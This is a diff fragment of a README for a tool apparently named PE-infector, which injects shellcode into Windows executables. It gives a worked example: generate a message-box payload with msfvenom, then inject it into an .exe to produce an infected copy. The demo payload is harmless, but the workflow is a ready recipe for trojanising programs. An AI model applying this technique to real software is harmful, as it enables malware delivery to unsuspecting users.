MastMind/PE-infector/README.md

 	Also support output for current sections (option -d)

 	Also support run shellcode in another thread (option -t or --thread.
 For 32bit only)

+## Example:

+For Kali Linux instruction (it doesn't matter which distributive use; it is just convinient to use Kali linux cause it has preinstalled metasploit framework for generating shellcodes).

+1. Generate the shellcode with effect show the window with caption:

+		msfvenom -p windows/messagebox TEXT="Big brother watches you." -f raw > shellcode.raw

+2. Inject generated raw file into exe (choosen method resz cause it works in the most cases):

+		PE-infector -i original.exe -o injected.exe -s shellcode.raw -m resz

+3. In success injected.exe will be generated
+4. Profit!